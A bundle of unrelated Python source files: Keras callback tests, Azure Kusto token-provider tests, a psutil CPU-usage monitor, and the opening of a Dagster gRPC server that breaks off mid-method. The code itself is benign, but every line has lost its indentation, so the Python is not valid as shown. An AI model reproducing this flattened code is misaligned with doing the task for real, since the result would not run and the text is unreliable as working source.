# Test case that replicates a Github issue.
# https://github.com/tensorflow/tensorflow/issues/37543
def test_TensorBoard_autoTrace_profileTwiceGraphMode(self):
tf.compat.v1.disable_eager_execution()
inp = keras.Input((1,))
out = keras.layers.Dense(units=1)(inp)
model = keras.Model(inp, out)
model.compile(gradient_descent.SGD(1), 'mse')
logdir = os.path.join(self.get_temp_dir(), 'tb1')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)],
)
# Verifies trace exists in the first logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
logdir = os.path.join(self.get_temp_dir(), 'tb2')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)],
)
# Verifies trace exists in the second logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
def test_TensorBoard_autoTrace_profileBatchRange(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
model.fit(
x,
y,
batch_size=4,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='-1,3',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='1,None',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
tf.__internal__.train.update_checkpoint_state(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
class SummaryOpsTest(tf.test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
tf.summary.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = tf.summary.create_file_writer(logdir)
with writer.as_default():
keras.callbacks.keras_model_summary(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@testing_utils.run_v2_only
def testKerasModel(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@testing_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
tf.summary.experimental.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
tf.summary.experimental.set_step(None)
@testing_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(keras.Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
model = SimpleSubclass()
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@testing_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = keras.Sequential()
with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json:
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
A list of all tf.Event protos in the event file.
"""
result = []
raw_dataset = tf.data.TFRecordDataset([filepath])
for raw_record in raw_dataset.take(10):
event = tf.compat.v1.Event()
event.ParseFromString(raw_record.numpy())
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert tf.compat.v1.gfile.Exists(logdir)
files = tf.compat.v1.gfile.ListDirectory(logdir)
assert len(files) == 1, 'Found not exactly one file in logdir: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
if __name__ == '__main__':
tf.test.main()
|
test_token_providers.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License
import os
import unittest
from threading import Thread
from asgiref.sync import async_to_sync
from azure.kusto.data._cloud_settings import CloudInfo
from azure.kusto.data._token_providers import *
KUSTO_URI = "https://sdkse2etest.eastus.kusto.windows.net"
TOKEN_VALUE = "little miss sunshine"
TEST_AZ_AUTH = False # enable this in environments with az cli installed, and make sure to call 'az login' first
TEST_MSI_AUTH = False # enable this in environments with MSI enabled and make sure to set the relevant environment variables
TEST_DEVICE_AUTH = False # User interaction required, enable this when running test manually
TEST_INTERACTIVE_AUTH = False # User interaction required, enable this when running test manually
class MockProvider(TokenProviderBase):
def __init__(self, is_async: bool = False):
super().__init__(is_async)
self._silent_token = False
self.init_count = 0
@staticmethod
def name() -> str:
return "MockProvider"
def _context_impl(self) -> dict:
return {"authority": "MockProvider"}
def _init_impl(self):
self.init_count = self.init_count + 1
def _get_token_impl(self) -> Optional[dict]:
self._silent_token = True
return {TokenConstants.MSAL_ACCESS_TOKEN: "token"}
def _get_token_from_cache_impl(self) -> Optional[dict]:
if self._silent_token:
return {TokenConstants.MSAL_ACCESS_TOKEN: "token"}
return None
class TokenProviderTests(unittest.TestCase):
@staticmethod
def test_base_provider():
# test init with no URI
provider = MockProvider()
# Test provider with URI, No silent token
provider = MockProvider()
token = provider._get_token_from_cache_impl()
assert provider.init_count == 0
assert token is None
token = provider.get_token()
assert provider.init_count == 1
assert TokenConstants.MSAL_ACCESS_TOKEN in token
token = provider._get_token_from_cache_impl()
assert TokenConstants.MSAL_ACCESS_TOKEN in token
token = provider.get_token()
assert provider.init_count == 1
good_token = {TokenConstants.MSAL_ACCESS_TOKEN: TOKEN_VALUE}
bad_token1 = None
bad_token2 = {"error": "something bad occurred"}
assert provider._valid_token_or_none(good_token) == good_token
assert provider._valid_token_or_none(bad_token1) is None
assert provider._valid_token_or_none(bad_token2) is None
assert provider._valid_token_or_throw(good_token) == good_token
exception_occurred = False
try:
provider._valid_token_or_throw(bad_token1)
except KustoClientError:
exception_occurred = True
finally:
assert exception_occurred
exception_occurred = False
try:
provider._valid_token_or_throw(bad_token2)
except KustoClientError:
exception_occurred = True
finally:
assert exception_occurred
@staticmethod
def get_token_value(token: dict):
assert token is not None
assert TokenConstants.MSAL_ERROR not in token
value = None
if TokenConstants.MSAL_ACCESS_TOKEN in token:
return token[TokenConstants.MSAL_ACCESS_TOKEN]
elif TokenConstants.AZ_ACCESS_TOKEN in token:
return token[TokenConstants.AZ_ACCESS_TOKEN]
else:
assert False
@staticmethod
def test_fail_async_call():
provider = BasicTokenProvider(token=TOKEN_VALUE)
try:
async_to_sync(provider.get_token_async)()
assert False, "Expected KustoAsyncUsageError to occur"
except KustoAsyncUsageError as e:
assert str(e) == "Method get_token_async can't be called from a synchronous client"
try:
async_to_sync(provider.context_async)()
assert False, "Expected KustoAsyncUsageError to occur"
except KustoAsyncUsageError as e:
assert str(e) == "Method context_async can't be called from a synchronous client"
@staticmethod
def test_basic_provider():
provider = BasicTokenProvider(token=TOKEN_VALUE)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) == TOKEN_VALUE
@staticmethod
def test_basic_provider_in_thread():
exc = []
def inner(exc):
try:
TokenProviderTests.test_basic_provider()
except Exception as e:
exc.append(e)
pass
t = Thread(target=inner, args=(exc,))
t.start()
t.join()
if exc:
raise exc[0]
@staticmethod
def test_callback_token_provider():
provider = CallbackTokenProvider(token_callback=lambda: TOKEN_VALUE, async_token_callback=None)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) == TOKEN_VALUE
provider = CallbackTokenProvider(token_callback=lambda: 0, async_token_callback=None) # token is not a string
exception_occurred = False
try:
provider.get_token()
except KustoClientError:
exception_occurred = True
finally:
assert exception_occurred
@staticmethod
def test_az_provider():
if not TEST_AZ_AUTH:
print(" *** Skipped Az-Cli Provider Test ***")
return
print("Note!\nThe test 'test_az_provider' will fail if 'az login' was not called.")
provider = AzCliTokenProvider(KUSTO_URI)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# another run to pass through the cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
@staticmethod
def test_msi_provider():
if not TEST_MSI_AUTH:
print(" *** Skipped MSI Provider Test ***")
return
user_msi_object_id = os.environ.get("MSI_OBJECT_ID")
user_msi_client_id = os.environ.get("MSI_CLIENT_ID")
# system MSI
provider = MsiTokenProvider(KUSTO_URI)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
if user_msi_object_id is not None:
args = {"object_id": user_msi_object_id}
provider = MsiTokenProvider(KUSTO_URI, args)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped MSI Provider Client Id Test ***")
if user_msi_client_id is not None:
args = {"client_id": user_msi_client_id}
provider = MsiTokenProvider(KUSTO_URI, args)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped MSI Provider Object Id Test ***")
@staticmethod
def test_user_pass_provider():
username = os.environ.get("USER_NAME")
password = os.environ.get("USER_PASS")
auth = os.environ.get("USER_AUTH_ID", "organizations")
if username and password and auth:
provider = UserPassTokenProvider(KUSTO_URI, auth, username, password)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped User & Pass Provider Test ***")
@staticmethod
def test_device_auth_provider():
if not TEST_DEVICE_AUTH:
print(" *** Skipped User Device Flow Test ***")
return
def callback(x):
# break here if you debug this test, and get the code from 'x'
print(x)
provider = DeviceLoginTokenProvider(KUSTO_URI, "organizations", callback)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
@staticmethod
def test_interactive_login():
if not TEST_INTERACTIVE_AUTH:
print(" *** Skipped interactive login Test ***")
return
auth_id = os.environ.get("APP_AUTH_ID", "72f988bf-86f1-41af-91ab-2d7cd011db47")
provider = InteractiveLoginTokenProvider(KUSTO_URI, auth_id)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
@staticmethod
def test_app_key_provider():
# default details are for kusto-client-e2e-test-app
# to run the test, get the key from Azure portal
app_id = os.environ.get("APP_ID", "b699d721-4f6f-4320-bc9a-88d578dfe68f")
auth_id = os.environ.get("APP_AUTH_ID", "72f988bf-86f1-41af-91ab-2d7cd011db47")
app_key = os.environ.get("APP_KEY")
if app_id and app_key and auth_id:
provider = ApplicationKeyTokenProvider(KUSTO_URI, auth_id, app_id, app_key)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped App Id & Key Provider Test ***")
@staticmethod
def test_app_cert_provider():
# default details are for kusto-client-e2e-test-app
# to run the test download the certs from Azure Portal
cert_app_id = os.environ.get("CERT_APP_ID", "b699d721-4f6f-4320-bc9a-88d578dfe68f")
cert_auth = os.environ.get("CERT_AUTH", "72f988bf-86f1-41af-91ab-2d7cd011db47")
thumbprint = os.environ.get("CERT_THUMBPRINT")
public_cert_path = os.environ.get("PUBLIC_CERT_PATH")
pem_key_path = os.environ.get("CERT_PEM_KEY_PATH")
if pem_key_path and thumbprint and cert_app_id:
with open(pem_key_path, "rb") as file:
pem_key = file.read()
provider = ApplicationCertificateTokenProvider(KUSTO_URI, cert_app_id, cert_auth, pem_key, thumbprint)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
if public_cert_path:
with open(public_cert_path, "r") as file:
public_cert = file.read()
provider = ApplicationCertificateTokenProvider(KUSTO_URI, cert_app_id, cert_auth, pem_key, thumbprint, public_cert)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped App Cert SNI Provider Test ***")
else:
print(" *** Skipped App Cert Provider Test ***")
@staticmethod
def test_cloud_mfa_off():
FAKE_URI = "https://fake_cluster_for_login_mfa_test.kusto.windows.net"
cloud = CloudInfo(
login_endpoint="https://login_endpoint",
login_mfa_required=False,
kusto_client_app_id="1234",
kusto_client_redirect_uri="",
kusto_service_resource_id="https://fakeurl.kusto.windows.net",
first_party_authority_url="",
)
CloudSettings._cloud_cache[FAKE_URI] = cloud
authority = "auth_test"
provider = UserPassTokenProvider(FAKE_URI, authority, "a", "b")
provider._init_once(init_only_resources=True)
context = provider.context()
assert context["authority"] == "https://login_endpoint/auth_test"
assert context["client_id"] == cloud.kusto_client_app_id
assert provider._scopes == ["https://fakeurl.kusto.windows.net/.default"]
@staticmethod
def test_cloud_mfa_on():
FAKE_URI = "https://fake_cluster_for_login_mfa_test.kusto.windows.net"
cloud = CloudInfo(
login_endpoint="https://login_endpoint",
login_mfa_required=True,
kusto_client_app_id="1234",
kusto_client_redirect_uri="",
kusto_service_resource_id="https://fakeurl.kusto.windows.net",
first_party_authority_url="",
)
CloudSettings._cloud_cache[FAKE_URI] = cloud
authority = "auth_test"
provider = UserPassTokenProvider(FAKE_URI, authority, "a", "b")
provider._init_once(init_only_resources=True)
context = provider.context()
assert context["authority"] == "https://login_endpoint/auth_test"
assert context["client_id"] == "1234"
assert provider._scopes == ["https://fakeurl.kustomfa.windows.net/.default"]
|
monitor.py
|
from multiprocessing import Process
from itertools import groupby
import multiprocessing
import os
import time
from typing import Any
import psutil
import datetime
import json
import queue
from jinja2 import Environment, FileSystemLoader
from .template_base import TemplateBase
from .helpers import datetimeConverter
from .scenario_result import ScenarioResult
def getProcessByName(processName: str) -> list[Process]:
procs: list[Process] = []
for proc in psutil.process_iter():
if processName in proc.name():
procs.append(proc)
return procs
def writeDataPoints(data, fileName):
datetimestr = datetime.datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
with open(fileName, 'a+') as f:
f.write(f"{datetimestr}> {json.dumps(data, default=datetimeConverter)}\n")
def getCpuUsageByPid(p: Process):
iowait = None
cpunum = None
if hasattr(psutil.Process, "cpu_num"):
cpunum = p.cpu_num()
cputimes = p.cpu_times()
cpus_percent = p.cpu_percent()
if hasattr(cputimes, "iowait"):
iowait = cputimes[4]
return { "pid": p.pid, "cpu": cpus_percent, "iowait": iowait, "core": cpunum}
def runMonitor(q: multiprocessing.Queue):
fileName = f"monitor.txt"
selfPid = os.getpid()
procList = {}
while True:
time.sleep(1)
procs = getProcessByName("python")
datapoint = []
for p in procs:
if p.pid not in procList and p.pid != selfPid:
procList[p.pid] = p
if p.pid != selfPid:
try:
usage = getCpuUsageByPid(procList[p.pid])
datapoint.append(usage)
except Exception as e:
print(f"monitor failed to get cpu usage for pid: {e}")
writeDataPoints(datapoint, fileName)
try:
msg = q.get(block=False)
break
except queue.Empty:
pass
class Monitor(TemplateBase):
def __init__(self) -> None:
self.signalQueue = multiprocessing.Queue()
self.monitorProcess = Process(daemon=True,target=runMonitor, args=(self.signalQueue,))
def startMonitor(self):
self.monitorProcess.start()
def stopMonitor(self):
self.signalQueue.put("STOP")
self.monitorProcess.join()
def __getAllLines(self, fileName: str):
with open(fileName, "r", encoding='utf8') as fh:
lines = [line.rstrip() for line in fh]
return lines
def __getAllPids(self, taskReport: Any):
pids = []
for key, group in groupby(sorted(taskReport,key=lambda x:x["feature"]), lambda x: x["feature"]):
for t in group:
scenarioResult: ScenarioResult = t["scenario"]
if scenarioResult:
for step in scenarioResult.steps:
if step["pid"] is not None:
pids.append(step["pid"])
return pids
def generateReport(self, taskReport: Any):
templateFileName = "monitor.html"
dataFile = f"monitor.txt"
env = Environment(loader=FileSystemLoader(os.path.dirname(__file__)))
cssContent = self.getTemplatePropertyContent('vis-timeline-graph2d.min.css')
jsContent = self.getTemplatePropertyContent('vis-timeline-graph2d.min.js')
template = env.get_template(templateFileName)
allPids = self.__getAllPids(taskReport)
allPids = list(dict.fromkeys(allPids))
pids = []
allItems = []
dataLines = self.__getAllLines(dataFile)
for line in dataLines:
date = line.split("> ")[0]
item = line.split("> ")[-1]
parsedItem = json.loads(item)
for p in parsedItem:
p["x"] = date
p["y"] = p["cpu"]
p["group"] = "cpu time"
if p["pid"] in allPids:
pids.append(p["pid"])
allItems += parsedItem
parsedItem = json.loads(item)
pids = list(dict.fromkeys(pids))
#print(f"all pids: {pids}")
#print(f"all itens: {allItems}")
output = template.render(
pids=pids,
css=cssContent,
js=jsContent,
allItems=json.dumps(allItems)
)
self.writeTemplateContent("monitor_output.html",output)
if os.path.exists(dataFile):
os.remove(dataFile)
|
server.py
|
import math
import os
import queue
import sys
import tempfile
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.errors import DagsterUserCodeProcessError
from dagster.core.host_representation import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import (
IPCErrorMessage,
ipc_write_stream,
open_ipc_subprocess,
read_unary_response,
)
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class LazyRepositorySymbolsAndCodePointers:
"""Enables lazily loading user code at RPC-time so that it doesn't interrupt startup and
we can gracefully handle user code errors."""
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
if self._loadable_repository_symbols is None:
self.load()
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
if self._code_pointers_by_repo_name is None:
self.load()
return self._code_pointers_by_repo_name
def load_loadable_repository_symbols(loadable_target_origin):
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
# The loadable_target_origin is currently Noneable to support instaniating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
# Client tells the server to shutdown by calling ShutdownServer (or by failing to send a
# hearbeat, at which point this event is set. The cleanup thread will then set the server
# termination event once all current executions have finished, which will stop the server)
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._repository_symbols_and_code_pointers = LazyRepositorySymbolsAndCodePointers(
loadable_target_origin
)
if not lazy_load_user_code:
self._repository_symbols_and_code_pointers.load()
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
"Pipeline execution process for {run_id} unexpectedly exited.".format(
run_id=run.run_id
)
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin,
"external_repository_origin",
ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
